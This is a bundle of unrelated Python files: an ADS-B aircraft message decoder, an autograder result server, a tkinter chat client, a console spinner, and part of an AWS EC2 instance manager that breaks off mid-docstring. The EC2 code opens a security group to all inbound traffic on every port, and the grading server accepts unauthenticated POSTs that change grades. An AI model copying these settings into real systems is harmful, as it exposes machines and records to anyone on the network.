# fmt: off import os import socket import threading import warnings from collections import UserDict from datetime import datetime, timedelta, timezone from operator import itemgetter from pathlib import Path import pkg_resources import pandas as pd import pyModeS as pms from tqdm.autonotebook import tqdm from typing import (Any, Dict, Iterable, Iterator, List, Optional, TextIO, Tuple, Union, cast) from ...core import Flight, Traffic from ...data.basic.airport import Airport from ...drawing.ipywidgets import TrafficWidget # fmt: on if pkg_resources.get_distribution("pyModeS").version < "2.0": warnings.warn("Install pyModeS>=2.0 from https://github.com/junzis/pyModeS") class StoppableThread(threading.Thread): """Thread class with a stop() method. The thread itself has to check regularly for the to_be_stopped() condition.""" def __init__(self, *args, **kwargs) -> None: super().__init__(*args, **kwargs) self.daemon = True # is it redundant? self._stop_event = threading.Event() def stop(self) -> None: self._stop_event.set() def to_be_stopped(self) -> bool: return self._stop_event.is_set() class Aircraft(object): def __init__(self, icao24: str, lat0: float, lon0: float) -> None: self.icao24 = icao24 self._callsign: Optional[str] = None self._flight: Optional[Flight] = None self.cumul: List[Dict] = [] self.t0: Optional[datetime] = None self.t1: Optional[datetime] = None self.tpos: Optional[datetime] = None self.m0: Optional[str] = None self.m1: Optional[str] = None self.lat: Optional[float] = None self.lon: Optional[float] = None self.alt: Optional[float] = None self.trk: Optional[float] = None self.spd: Optional[float] = None self.lat0: float = lat0 self.lon0: float = lon0 self.lock = threading.Lock() @property def flight(self) -> Optional[Flight]: with self.lock: # access then clear not thread-safe, hence the lock df = pd.DataFrame.from_records(self.cumul) self.cumul.clear() if self._flight is not None: df = pd.concat([self._flight.data, df], sort=False) if len(df) == 0: return None self._flight = Flight( df.assign( callsign=df.callsign.replace("", None) .fillna(method="ffill") .fillna(method="bfill") ) ) return self._flight @property def callsign(self): return self._callsign @callsign.setter def callsign(self, args): t, msg = args callsign = pms.adsb.callsign(msg).strip("_") if callsign == "": return self._callsign = callsign with self.lock: self.cumul.append( dict(timestamp=t, icao24=self.icao24, callsign=self._callsign) ) @property def speed(self): pass @speed.setter def speed(self, args): t, msg = args vdata = pms.adsb.velocity(msg) if vdata is None: return spd, trk, roc, tag = vdata if tag != "GS": # does it ever happen... return if (spd is None) or (trk is None): return self.spd = spd self.trk = trk delta = pms.adsb.altitude_diff(msg) with self.lock: self.cumul.append( dict( timestamp=t, icao24=self.icao24, groundspeed=spd, track=trk, vertical_rate=roc, ) ) if delta is not None and self.alt is not None: self.cumul[-1]["geoaltitude"] = self.alt + delta @property def position(self): pass @position.setter def position(self, args): t, msg = args oe = pms.adsb.oe_flag(msg) setattr(self, "m" + str(oe), msg) setattr(self, "t" + str(oe), t) if ( self.t0 is not None and self.t1 is not None and abs((self.t0 - self.t1).total_seconds()) < 10 ): latlon = pms.adsb.position( self.m0, self.m1, self.t0, self.t1, self.lat0, self.lon0 ) else: latlon = None if latlon is not None: self.tpos = t self.lat, self.lon = latlon self.alt = pms.adsb.altitude(msg) with self.lock: self.cumul.append( dict( timestamp=t, icao24=self.icao24, latitude=self.lat, longitude=self.lon, altitude=self.alt, onground=False, ) ) @property def surface(self): pass @surface.setter def surface(self, args): t, msg = args self.lat, self.lon = pms.adsb.surface_position_with_ref( msg, self.lat0, self.lon0 ) with self.lock: self.cumul.append( dict( timestamp=t, icao24=self.icao24, latitude=self.lat, longitude=self.lon, onground=True, ) ) @property def altcode(self): pass @altcode.setter def altcode(self, args): t, msg = args self.alt = pms.common.altcode(msg) with self.lock: self.cumul.append( dict(timestamp=t, icao24=self.icao24, altitude=self.alt) ) @property def idcode(self): pass @idcode.setter def idcode(self, args): t, msg = args with self.lock: self.cumul.append( dict( timestamp=t, icao24=self.icao24, squawk=pms.common.idcode(msg), ) ) @property def bds20(self): pass @bds20.setter def bds20(self, args): t, msg = args callsign = pms.commb.cs20(msg).strip("_") if callsign == "": return self._callsign = callsign with self.lock: # in case altitude was already included from altcode (DF 4 or 20) # or squawk from idcode (DF5 or 21) last_entry = self.cumul[-1] if len(self.cumul) > 0 else None if last_entry is not None and last_entry["timestamp"] == t: self.cumul[-1] = dict(**last_entry, callsign=self._callsign) else: self.cumul.append( dict( timestamp=t, icao24=self.icao24, callsign=self._callsign ) ) @property def bds40(self): pass @bds40.setter def bds40(self, args): t, msg = args with self.lock: # in case altitude was already included from altcode (DF 4 or 20) # or squawk from idcode (DF5 or 21) last_entry = self.cumul[-1] if len(self.cumul) > 0 else None if last_entry is not None and last_entry["timestamp"] == t: self.cumul[-1] = dict( **last_entry, selected_fms=pms.commb.alt40fms(msg), selected_mcp=pms.commb.alt40mcp(msg), barometric_setting=pms.commb.p40baro(msg), ) else: self.cumul.append( dict( timestamp=t, icao24=self.icao24, selected_fms=pms.commb.alt40fms(msg), selected_mcp=pms.commb.alt40mcp(msg), barometric_setting=pms.commb.p40baro(msg), ) ) @property def bds44(self): pass @bds44.setter def bds44(self, args): t, msg = args wind = pms.commb.wind44(msg) wind = wind if wind is not None else (None, None) with self.lock: # in case altitude was already included from altcode (DF 4 or 20) # or squawk from idcode (DF5 or 21) last_entry = self.cumul[-1] if len(self.cumul) > 0 else None if last_entry is not None and last_entry["timestamp"] == t: self.cumul[-1] = dict( **last_entry, humidity=pms.commb.hum44(msg), pression=pms.commb.p44(msg), temperature=pms.commb.temp44(msg), windspeed=wind[0], winddirection=wind[1], ) else: self.cumul.append( dict( timestamp=t, icao24=self.icao24, humidity=pms.commb.hum44(msg), pression=pms.commb.p44(msg), temperature=pms.commb.temp44(msg), windspeed=wind[0], winddirection=wind[1], ) ) @property def bds50(self): pass @bds50.setter def bds50(self, args): t, msg = args with self.lock: # in case altitude was already included from altcode (DF 4 or 20) # or squawk from idcode (DF5 or 21) last_entry = self.cumul[-1] if len(self.cumul) > 0 else None if last_entry is not None and last_entry["timestamp"] == t: self.cumul[-1] = dict( **last_entry, groundspeed=pms.commb.gs50(msg), roll=pms.commb.roll50(msg), tas=pms.commb.tas50(msg), track=pms.commb.trk50(msg), track_rate=pms.commb.rtrk50(msg), ) else: self.cumul.append( dict( timestamp=t, icao24=self.icao24, groundspeed=pms.commb.gs50(msg), roll=pms.commb.roll50(msg), tas=pms.commb.tas50(msg), track=pms.commb.trk50(msg), track_rate=pms.commb.rtrk50(msg), ) ) @property def bds60(self): pass @bds60.setter def bds60(self, args): t, msg = args with self.lock: # in case altitude was already included from altcode (DF 4 or 20) # or squawk from idcode (DF5 or 21) last_entry = self.cumul[-1] if len(self.cumul) > 0 else None if last_entry is not None and last_entry["timestamp"] == t: self.cumul[-1] = dict( **last_entry, ias=pms.commb.ias60(msg), heading=pms.commb.hdg60(msg), mach=pms.commb.mach60(msg), vertical_rate_barometric=pms.commb.vr60baro(msg), vertical_rate_inertial=pms.commb.vr60ins(msg), ) else: self.cumul.append( dict( timestamp=t, icao24=self.icao24, ias=pms.commb.ias60(msg), heading=pms.commb.hdg60(msg), mach=pms.commb.mach60(msg), vertical_rate_barometric=pms.commb.vr60baro(msg), vertical_rate_inertial=pms.commb.vr60ins(msg), ) ) class AircraftDict(UserDict): lat0: float lon0: float def __missing__(self, key): self[key] = value = Aircraft(key, self.lat0, self.lon0) return value def set_latlon(self, lat0, lon0): self.lat0 = lat0 self.lon0 = lon0 for ac in self.values(): ac.lat0 = lat0 ac.lon0 = lon0 class Decoder: thread: Optional[StoppableThread] def __init__( self, reference: Union[str, Airport, Tuple[float, float]] ) -> None: if isinstance(reference, str): from ...data import airports reference = airports[reference] if isinstance(reference, Airport): lat0, lon0 = reference.lat, reference.lon else: lat0, lon0 = cast(Tuple[float, float], reference) self.acs = AircraftDict() self.acs.set_latlon(lat0, lon0) self.thread = None @classmethod def from_file( cls, filename: Union[str, Path], reference: Union[str, Airport, Tuple[float, float]], ) -> "Decoder": if isinstance(filename, str): filename = Path(filename) with filename.open("r") as fh: all_lines = fh.readlines() decoder = cls(reference) decoder.process_msgs( list( ( datetime.fromtimestamp( float(line.strip().split(",")[0]) ), cast(str, line.strip().split(",")[1][18:]), ) for line in all_lines ) ) return decoder @classmethod def from_socket( cls, socket: socket.socket, reference: Union[str, Airport, Tuple[float, float]], dump1090: bool = False, fh: Optional[TextIO] = None, ) -> "Decoder": decoder = cls(reference) def next_msg(s: Any) -> Iterator[str]: while True: if decoder.thread is None or decoder.thread.to_be_stopped(): s.close() return data = s.recv(2048) while len(data) > 10: if data[1] == 0x33: yield data[:23] data = data[23:] continue if data[1] == 0x32: data = data[16:] continue if data[1] == 0x31: data = data[11:] continue if data[1] == 0x34: data = data[23:] continue it = data.find(0x1a) if it < 1: break data = data[it:] def decode(): for i, bin_msg in enumerate(next_msg(socket)): if len(bin_msg) < 23: continue msg = "".join(["{:02x}".format(t) for t in bin_msg]) # Timestamp decoding now = datetime.now(timezone.utc) if not dump1090: timestamp = int(msg[4:16], 16) nanos = timestamp & 0x00003FFFFFFF secs = timestamp >> 30 now = now.replace(hour=0, minute=0, second=0, microsecond=0) now += timedelta(seconds=secs, microseconds=nanos / 1000) if fh is not None: fh.write("{},{}\n".format(now.timestamp(), msg)) if dump1090 and i & 127 == 127: decoder.redefine_reference(now) decoder.process(now, msg[18:]) decoder.thread = StoppableThread(target=decode) decoder.thread.start() return decoder def stop(self): if self.thread is not None and self.thread.is_alive(): self.thread.stop() self.thread.join() def __del__(self): self.stop() @classmethod def from_dump1090( cls, reference: Union[str, Airport, Tuple[float, float]], file_pattern: str = "~/ADSB_EHS_RAW_%Y%m%d_dump1090.csv", ) -> "Decoder": now = datetime.now(timezone.utc) filename = now.strftime(file_pattern) today = os.path.expanduser(filename) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("localhost", 30005)) fh = open(today, "a", 1) return cls.from_socket(s, reference, True, fh) @classmethod def from_address( cls, host: str, port: int, reference: Union[str, Airport, Tuple[float, float]], file_pattern: str = "~/ADSB_EHS_RAW_%Y%m%d_tcp.csv", ) -> "Decoder": now = datetime.now(timezone.utc) filename = now.strftime(file_pattern) today = os.path.expanduser(filename) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) fh = open(today, "a", 1) return cls.from_socket(s, reference, False, fh) def redefine_reference(self, time: datetime) -> None: pos = list( (ac.lat, ac.lon) for ac in self.acs.values() if ac.alt is not None and ac.alt < 5000 and ac.tpos is not None and (time - ac.tpos).total_seconds() < 20 * 60 ) n = len(pos) if n > 0: self.acs.set_latlon( sum(a[0] for a in pos) / n, sum(a[1] for a in pos) / n ) def process_msgs(self, msgs: Iterable[Tuple[datetime, str]]) -> None: for i, (time, msg) in tqdm(enumerate(msgs), total=sum(1 for _ in msgs)): if i & 127 == 127: self.redefine_reference(time) self.process(time, msg) def process( self, time: datetime, msg: str, *args, spd: Optional[float] = None, trk: Optional[float] = None, alt: Optional[float] = None, ) -> None: if len(msg) != 28: return df = pms.df(msg) if df == 4 or df == 20: icao = pms.icao(msg) ac = self.acs[icao.lower()] ac.altcode = time, msg if df == 5 or df == 21: icao = pms.icao(msg) ac = self.acs[icao.lower()] ac.idcode = time, msg if df == 17 or df == 18: # ADS-B if int(pms.crc(msg, encode=False), 2) != 0: return tc = pms.adsb.typecode(msg) icao = pms.icao(msg) ac = self.acs[icao.lower()] if 1 <= tc <= 4: ac.callsign = time, msg if 5 <= tc <= 8: ac.surface = time, msg if tc == 19: ac.speed = time, msg if 9 <= tc <= 18: # This is barometric altitude ac.position = time, msg if 20 <= tc <= 22: # Only GNSS altitude pass # if 9 <= tc <= 18: # ac["nic_bc"] = pms.adsb.nic_b(msg) # if (5 <= tc <= 8) or (9 <= tc <= 18) or (20 <= tc <= 22): # ac["HPL"], ac["RCu"], ac["RCv"] = pms.adsb.nuc_p(msg) # if (ac["ver"] == 1) and ("nic_s" in ac.keys()): # ac["Rc"], ac["VPL"] = pms.adsb.nic_v1(msg, ac["nic_s"]) # elif ( # (ac["ver"] == 2) # and ("nic_a" in ac.keys()) # and ("nic_bc" in ac.keys()) # ): # ac["Rc"] = pms.adsb.nic_v2(msg, ac["nic_a"], ac["nic_bc"]) # if tc == 19: # ac["HVE"], ac["VVE"] = pms.adsb.nuc_v(msg) # if ac["ver"] in [1, 2]: # ac["EPU"], ac["VEPU"] = pms.adsb.nac_v(msg) # if tc == 29: # ac["PE_RCu"], ac["PE_VPL"], ac["base"] = pms.adsb.sil( # msg, ac["ver"] # ) # ac["HFOMr"], ac["VFOMr"] = pms.adsb.nac_p(msg) # if tc == 31: # ac["ver"] = pms.adsb.version(msg) # ac["HFOMr"], ac["VFOMr"] = pms.adsb.nac_p(msg) # ac["PE_RCu"], ac["PE_VPL"], ac["sil_base"] = pms.adsb.sil( # msg, ac["ver"] # ) # if ac["ver"] == 1: # ac["nic_s"] = pms.adsb.nic_s(msg) # elif ac["ver"] == 2: # ac["nic_a"], ac["nic_bc"] = pms.adsb.nic_a_c(msg) elif df == 20 or df == 21: bds = pms.bds.infer(msg) icao = pms.icao(msg) ac = self.acs[icao.lower()] if bds == "BDS20": ac.bds20 = time, msg return if bds == "BDS40": ac.bds40 = time, msg return if bds == "BDS44": ac.bds44 = time, msg return if bds == "BDS50,BDS60": if spd is not None and trk is not None and alt is not None: bds = pms.bds.is50or60(msg, spd, trk, alt) elif ( ac.spd is not None and ac.trk is not None and ac.alt is not None ): bds = pms.bds.is50or60(msg, ac.spd, ac.trk, ac.alt) else: return # do not return! if bds == "BDS50": ac.bds50 = time, msg return if bds == "BDS60": ac.bds60 = time, msg return @property def aircraft(self) -> List[Dict[str, Any]]: return sorted( ( dict( icao24=key, callsign=ac.callsign, length=( (len(ac.cumul) + len(ac._flight)) if ac._flight is not None else len(ac.cumul) ), position=ac.lat is not None, data=ac, ) for (key, ac) in self.acs.items() if ac.callsign is not None ), key=itemgetter("length"), reverse=True, ) @property def traffic(self) -> Optional[Traffic]: try: return Traffic.from_flights( self[elt["icao24"]] for elt in self.aircraft ) except ValueError: return None @property def widget(self) -> "DecoderWidget": return DecoderWidget(self) def __getitem__(self, icao: str) -> Optional[Flight]: return self.acs[icao].flight class DecoderWidget(TrafficWidget): def __init__(self, decoder: Decoder, *args, **kwargs) -> None: self.decoder = decoder traffic = decoder.traffic if traffic is None: raise ValueError("traffic is None") super().__init__(traffic, *args, **kwargs) @property def traffic(self) -> Traffic: traffic = self.decoder.traffic assert traffic is not None self._traffic = traffic self.t_view = self._traffic self.set_time_range() return self._traffic
ag_result_server.py
import BaseHTTPServer import SocketServer import cgi import json import threading import logging logger = logging.getLogger('ag_result_server'); from . import config, jprint from db.schema import connection as conn, Assignment, Member, Grade import emailer from redis import Redis from rq import Queue work_queue = Queue(connection=Redis()) class AutograderResultException(Exception): pass def handle_result(data): """ Handles output from an autograder. This function has the ability to record a score in the database, email students their results, and log the raw output from the autograder. """ try: # required score = float(data['score']) assignment_name = data['assignment'] repo = data['repo'] submit = bool(data['submit']) # optional group_repo = bool(data.get('group_repo')) grader_login = data.get('grader_login') comments = data.get('comments') email_content = data.get('email_content') email_plain = bool(data.get('email_plain')) raw_output = data.get('raw_output') except KeyError: raise AutograderResultException( 'Received invalid data; required fields are missing.\n{0}'.format( jprint.pformat(data))); assignment = conn.Assignment.find_one({'name': assignment_name}) owner = conn.Group.find_one({'name': repo}) if group_repo \ else conn.Member.find_one({'login': repo}) if not owner or not assignment: raise AutograderResultException( 'Assignment or owner do not exist; ignoring ag result.\n{0}.'.format( jprint.pformat(data))) if submit: submit_grade(assignment['_id'], owner['_id'], group_repo, score, grader_login=grader_login, comments=comments) if email_content: recipients = [] if not group_repo: recipients.append(owner['email']) else: recipients.extend([student['email'] for student in conn.Member.find({'_id': {'$in': owner['members']}})]) email_results(recipients, assignment['name'], email_content, email_plain) if raw_output: logger.info(raw_output) def submit_grade(assignment_id, owner_id, group_repo, score, grader_login=None, comments=None): """ Submits grade into database. """ grader = conn.Member.find_one({'login': grader_login}) if grader_login \ else None result = grade_coll.update( {'assignment': assignment_id, 'owner': owner_id}, {'$set': { 'group': group_repo, 'score': score, 'grader': (grader['_id'] if grader else None), 'comments': comments} }, upsert=True ) if 'upserted' in result: new_grade = conn.Grade.find_one({'_id': result['upserted']}) new_grade.save() # re-save grade to set up relations grade_coll = conn[config['course_name']][Grade.__collection__] def email_results(recipients, assignment_name, email_content, email_plain=True): """ Emails autograder output to recipient students. """ subject = '[{0} Autograder] {1} Results'.format(config['course_name'], assignment_name) for recipient in recipients: if email_plain: emailer.send_plaintext(recipient, subject, email_content) else: emailer.send_markdown(recipient, subject, email_content) class AutograderResultHandler(BaseHTTPServer.BaseHTTPRequestHandler): def __init__(self, request, client_address, server): BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, request, client_address, server) def do_POST(self): try: ctype, pdict = cgi.parse_header(self.headers.getheader('content-type')) except Exception: self.send_error(403, 'No Content-Type in header.') return if ctype == 'application/json': length = int(self.headers.getheader('content-length')) data = json.loads(self.rfile.read(length)) logger.debug('Recieved autograder result:\n{0}'.format( jprint.pformat(data))) work_queue.enqueue(handle_result, data) self.send_response(200) else: logger.warn('Content type is not JSON; sending 403.') self.send_error(403, 'Content type must be JSON.') def log_message(self, format, *args): logger.info(format % args) def shutdown(self): logger.info('Shutting down.') super(self.__class__, self).shutdown(self) def run_ag_result_server(host='', port=int(config['ag_result_server_port'])): server_address = (host, port) server = SocketServer.TCPServer(server_address, AutograderResultHandler) server.request_queue_size = 50 # increase maximum simultaneous requests t = threading.Thread(target=server.serve_forever) t.setDaemon(True) # don't hang on exit t.start() logger = logging.getLogger('ag_result_server') logger.info('AutograderResultHandler started on {0}'.format(server.server_address)) return server
Client.py
import socket from threading import Thread from tkinter import * client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ip_address = '127.0.0.1' port = 8000 client.connect((ip_address, port)) print("Connected with the server...") class GUI: def __init__(self): self.Window = Tk() self.Window.withdraw() self.login = Toplevel() self.login.title("Login") self.login.resizable(width = False, height = False) self.login.configure(width = 400, height = 300) self.pls = Label(self.login, text = "Please login to continue", justify = CENTER, font = "Helvetica 14 bold") self.pls.place(relheight = 0.15, relx = 0.2, rely = 0.07) self.labelName = Label(self.login, text = "Name: ", font = "Helvetica 12") self.labelName.place(relheight = 0.2, relx = 0.1, rely = 0.2) self.entryName = Entry(self.login, font = "Helvetica 14") self.entryName.place(relwidth = 0.4, relheight = 0.12, relx = 0.35, rely = 0.2) self.entryName.focus() self.go = Button(self.login, text = "CONTINUE", font = "Helvetica 14 bold", command = lambda: self.goAhead(self.entryName.get())) self.go.place(relx = 0.4, rely = 0.55) self.Window.mainloop() def goAhead(self, name): self.login.destroy() self.layout(name) rcv = Thread(target=self.receive) rcv.start() def layout(self,name): self.name = name self.Window.deiconify() self.Window.title("CHATROOM") self.Window.resizable(width = False, height = False) self.Window.configure(width = 470, height = 550, bg = "#17202A") self.labelHead = Label(self.Window, bg = "#17202A", fg = "#EAECEE", text = self.name, font = "Helvetica 13 bold", pady = 5) self.labelHead.place(relwidth = 1) self.line = Label(self.Window, width = 450, bg = "#ABB2B9") self.line.place(relwidth = 1, rely = 0.07, relheight = 0.012) self.textCons = Text(self.Window, width = 20, height = 2, bg = "#17202A", fg = "#EAECEE", font = "Helvetica 14", padx = 5, pady = 5) self.textCons.place(relheight = 0.745, relwidth = 1, rely = 0.08) self.labelBottom = Label(self.Window, bg = "#ABB2B9", height = 80) self.labelBottom.place(relwidth = 1, rely = 0.825) self.entryMsg = Entry(self.labelBottom, bg = "#2C3E50", fg = "#EAECEE", font = "Helvetica 13") self.entryMsg.place(relwidth = 0.74, relheight = 0.06, rely = 0.008, relx = 0.011) self.entryMsg.focus() self.buttonMsg = Button(self.labelBottom, text = "Send", font = "Helvetica 10 bold", width = 20, bg = "#ABB2B9", command = lambda: self.sendButton(self.entryMsg.get())) self.buttonMsg.place(relx = 0.77, rely = 0.008, relheight = 0.06, relwidth = 0.22) self.textCons.config(cursor = "arrow") scrollbar = Scrollbar(self.textCons) scrollbar.place(relheight = 1, relx = 0.974) scrollbar.config(command = self.textCons.yview) self.textCons.config(state = DISABLED) def sendButton(self, msg): self.textCons.config(state = DISABLED) self.msg=msg self.entryMsg.delete(0, END) snd= Thread(target = self.write) snd.start() def show_message(self, message): self.textCons.config(state = NORMAL) self.textCons.insert(END, message+"\n\n") self.textCons.config(state = DISABLED) self.textCons.see(END) def receive(self): while True: try: message = client.recv(2048).decode('utf-8') if message == 'NICKNAME': client.send(self.name.encode('utf-8')) else: self.show_message(message) except: print("An error occured!") client.close() break def write(self): self.textCons.config(state=DISABLED) while True: message = (f"{self.name}: {self.msg}") client.send(message.encode('utf-8')) self.show_message(message) break g = GUI()
spinner.py
import sys import threading import itertools import time class Spinner: def __init__(self, message, delay=0.1): self.spinner = itertools.cycle(['-', '/', '|', '\\']) self.delay = delay self.busy = False self.spinner_visible = False sys.stdout.write(message) def write_next(self): with self._screen_lock: if not self.spinner_visible: sys.stdout.write(next(self.spinner)) self.spinner_visible = True sys.stdout.flush() def remove_spinner(self, cleanup=False): with self._screen_lock: if self.spinner_visible: sys.stdout.write('\b') self.spinner_visible = False if cleanup: sys.stdout.write(' ') # overwrite spinner with blank sys.stdout.write('\r') # move to next line sys.stdout.flush() def spinner_task(self): while self.busy: self.write_next() time.sleep(self.delay) self.remove_spinner() def __enter__(self): if sys.stdout.isatty(): self._screen_lock = threading.Lock() self.busy = True self.thread = threading.Thread(target=self.spinner_task) self.thread.start() def __exit__(self, exception, value, tb): if sys.stdout.isatty(): self.busy = False self.remove_spinner(cleanup=True) else: sys.stdout.write('\r')
instance.py
import atexit import boto3 import time import logging import os import socket import io import sys import threading from botocore.exceptions import ClientError import paramiko from .resources import resources # The ARN of an IAM policy that allows full access to S3. S3_FULL_ACCESS_ARN = "arn:aws:iam::aws:policy/AmazonS3FullAccess" # The URL to GET from within an instance in order to check the instance's # "instance-action" metadata attribute. INSTANCE_ACTION_URL = "http://169.254.169.254/latest/meta-data/spot/" \ "instance-action" # The interval, in seconds, to wait between checks of an instance's # "instance-action" metadata attribute. Per https://docs.aws.amazon.com/ # AWSEC2/latest/UserGuide/spot-interruptions.html. TERMINATION_MONITORING_INTERVAL = 5 # The SSH keepalive interval to use for SSH connections to instances, in # seconds. SSH_KEEPALIVE = 15 ec2 = boto3.resource('ec2') class Instance(object): """An EC2 instance.""" # The interval at which to poll for an AMI becoming available, in seconds. IMAGE_POLL_INTERVAL = 3 # The maximum number of times to poll for an AMI becoming available. IMAGE_POLL_MAX = (5 * 60) // IMAGE_POLL_INTERVAL # The interval (in seconds) at which to poll for an instance entering the # "running" state. _RUNNING_POLL_INTERVAL = 3 # The maximum amount of time (in seconds) to wait for an instance to enter # the "running" state. _RUNNING_POLL_TIMEOUT = 3 * 60 # The name of the key pair used by Instances. KEY_PAIR_NAME = "cirrus_key_pair" # The path at which to save the private key to Instances. May begin with a # tilde. PRIVATE_KEY_PATH = "~/.ssh/cirrus_key_pair.pem" # The name of the security group used by Instances. SECURITY_GROUP_NAME = "cirrus_security_group" # The name of the role used by Instances. ROLE_NAME = "cirrus_instance_role" # The name of the instance profile used by Instances. INSTANCE_PROFILE_NAME = "cirrus_instance_profile" # The number of authentication failures that are allowed to occur while # connecting to an instance. _AUTHENTICATION_FAILURES = 5 @staticmethod def images_exist(name): """Return whether any AMI with a given name, owned by the current user, exists. Args: name (str): The name. Returns: bool: Whether any exists. """ log = logging.getLogger("cirrus.instance.Instance") log.debug("Describing images.") response = resources.ec2_client.describe_images( Filters=[{"Name": "name", "Values": [name]}], Owners=["self"]) result = len(response["Images"]) > 0 log.debug("Done.") return result @staticmethod def delete_images(name): """Delete any AMI with a given name, owned by the current user. Args: name (str): The name. """ log = logging.getLogger("cirrus.instance.Instance") log.debug("Describing images.") response = resources.ec2_client.describe_images( Filters=[{"Name": "name", "Values": [name]}], Owners=["self"]) for info in response["Images"]: image_id = info["ImageId"] log.debug("Deleting image %s." % image_id) resources.ec2_resource.Image(info["ImageId"]).deregister() log.debug("Done.") @classmethod def set_up_key_pair(cls): """Create a key pair for use by `Instance`s. Deletes any existing key pair with the same name. Saves the private key to `~/cirrus_key_pair.pem`. """ from . import automate log = logging.getLogger("cirrus.instance.Instance.set_up_key_pair") log.debug("Checking for an existing key pair.") filter = {"Name": "key-name", "Values": [cls.KEY_PAIR_NAME]} response = resources.ec2_client.describe_key_pairs(Filters=[filter]) if len(response["KeyPairs"]) > 0: log.debug("Deleting an existing key pair.") resources.ec2_client.delete_key_pair(KeyName=cls.KEY_PAIR_NAME) log.debug("Creating key pair.") response = resources.ec2_client.create_key_pair( KeyName=cls.KEY_PAIR_NAME) log.debug("Saving private key.") path = os.path.expanduser(cls.PRIVATE_KEY_PATH) if not os.path.exists(os.path.dirname(path)): os.path.makedirs(os.path.dirname(path)) with open(path, "w") as f: f.write(response["KeyMaterial"]) log.debug("Done.") @classmethod def set_up_security_group(cls): """Create a security group for use by `Instance`s. Deletes any existing security groups with the same name. """ from . import automate log = logging.getLogger( "cirrus.instance.Instance.set_up_security_group") log.debug("Checking for existing security groups.") filter = {"Name": "group-name", "Values": [cls.SECURITY_GROUP_NAME]} response = resources.ec2_client.describe_security_groups( Filters=[filter]) for group_info in response["SecurityGroups"]: log.debug("Deleting an existing security group.") resources.ec2_client.delete_security_group( GroupId=group_info["GroupId"]) log.debug("Creating security group.") resources.ec2_client.create_security_group( GroupName=cls.SECURITY_GROUP_NAME, Description="Generated by the Cirrus setup script. Lets all " "inbound and outbound traffic through." ) # Allow all outbound traffic so that Instances will be able to fetch # software and data. Allow all inbound traffic so that we will be able # to send messages to programs on Instances. log.debug("Configuring security group.") # An IpProtocol of -1 means "all protocols" and additionally implies # "all ports". resources.ec2_client.authorize_security_group_ingress( GroupName=cls.SECURITY_GROUP_NAME, IpProtocol="-1", CidrIp="0.0.0.0/0") log.debug("Done.") @classmethod def set_up_role(cls): """Create a role for use by `Instance`s. Deletes any existing role with the same name. """ from . import automate log = logging.getLogger("cirrus.instance.Instance.set_up_role") log.debug("Checking for an existing role.") iam_client = resources.iam_client # TODO: Could cause a problem under rare circumstances. We are assuming # that there are less than 1000 roles in the account. roles_response = iam_client.list_roles() exists = False for role_info in roles_response["Roles"]: if role_info["RoleName"] == cls.ROLE_NAME: exists = True break if exists: log.debug("Listing the policies of existing role.") role_policy_response = iam_client.list_attached_role_policies( RoleName=cls.ROLE_NAME) for policy_info in role_policy_response["AttachedPolicies"]: log.debug("Detaching policy from existing role.") iam_client.detach_role_policy( RoleName=cls.ROLE_NAME, PolicyArn=policy_info["PolicyArn"] ) log.debug("Listing the instance profiles of existing role.") role = resources.iam_resource.Role(cls.ROLE_NAME) for instance_profile in role.instance_profiles.all(): log.debug("Detaching instance profile from existing role.") instance_profile.remove_role(RoleName=cls.ROLE_NAME) log.debug("Deleting an existing role.") iam_client.delete_role(RoleName=cls.ROLE_NAME) log.debug("Creating role.") role = iam_client.create_role( RoleName=cls.ROLE_NAME, AssumeRolePolicyDocument="""{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "Service": "ec2.amazonaws.com" }, "Action": "sts:AssumeRole" } ] }""" ) log.debug("Attaching policies to role.") iam_client.attach_role_policy(RoleName=cls.ROLE_NAME, PolicyArn=S3_FULL_ACCESS_ARN) log.debug("Done.") @classmethod def set_up_instance_profile(cls): """Create an instance profile for use by `Instance`s. Deletes any existing instance profile with the same name. The instance role must have already been created. """ from . import automate log = logging.getLogger( "cirrus.instance.Instance.set_up_instance_profile") log.debug("Checking for an existing instance profile.") existing = None for instance_profile in resources.iam_resource.instance_profiles.all(): if instance_profile.name == cls.INSTANCE_PROFILE_NAME: existing = instance_profile break if existing is not None: log.debug("Listing the roles of existing instance profile.") for role in existing.roles: log.debug("Removing role from existing instance profile.") existing.remove_role(RoleName=role.name) log.debug("Deleting existing instance profile.") existing.delete() log.debug("Creating instance profile.") instance_profile = resources.iam_resource.create_instance_profile( InstanceProfileName=cls.INSTANCE_PROFILE_NAME) log.debug("Adding role to instance profile.") instance_profile.add_role(RoleName=cls.ROLE_NAME) log.debug("Waiting for changes to take effect.") # IAM is eventually consistent, so we need to wait for our changes to be # reflected. The delay distribution is heavy-tailed, so this might # still error, rarely. The right way is to retry at an interval. time.sleep(automate.IAM_CONSISTENCY_DELAY) log.debug("Done.") def __init__(self, name, disk_size, typ, username, ami_id=None, ami_owner_name=None, spot_bid=None, port=None): """Define an EC2 instance. Args: name (str): Name for the instance. The same name will be used for the key pair and security group that get created. disk_size (int): Disk space for the instance, in GB. typ (str): Type for the instance. username (str): SSH username for the AMI. ami_id (str): ID of the AMI for the instance. If omitted or None, `ami_name` must be provided. ami_owner_name (tuple[str, str]): The owner and name of the AMI for the instance. Only used if `ami_id` is not provided. The first AMI found with the name `ami_owner_name[1]` owned by `ami_owner_name[0]` is used. Valid choices for `ami_owner_name[0]` are `"self"` to indicate the current account, `"amazon"` to indicate AWS itself, or any account ID. spot_bid (str): The spot instance bid to make, as a dollar amount + per hour. If omitted or None, the instance will not be spot. """ self._name = name self._disk_size = disk_size self._ami_id = ami_id self._type = typ self._username = username self._spot_bid = spot_bid self._log = logging.getLogger("cirrus.instance.Instance") self.port = port self.elastic_ip = None if self._ami_id is None: assert ami_owner_name is not None, \ "When ami_id is not specified, ami_owner_name must be." self._log.debug("Resolving AMI owner/name to AMI ID.") owner, name = ami_owner_name filter = { "Name": "name", "Values": [name] } response = resources.ec2_client.describe_images( Filters=[filter], Owners=[owner] ) if len(response["Images"]) > 0: self._ami_id = response["Images"][0]["ImageId"] else: raise RuntimeError("No AMIs with the given owner/name were " "found.") else: assert ami_owner_name is None, \ "When ami_id is specified, ami_owner_name should not be." self.instance = None self._ssh_client = None self._sftp_client = None self._buffering_commands = False self._buffered_commands = [] self._should_stop_monitoring = None self._log.debug("Done.") def start(self): """Start the instance. If an instance with the same name is already running, it will 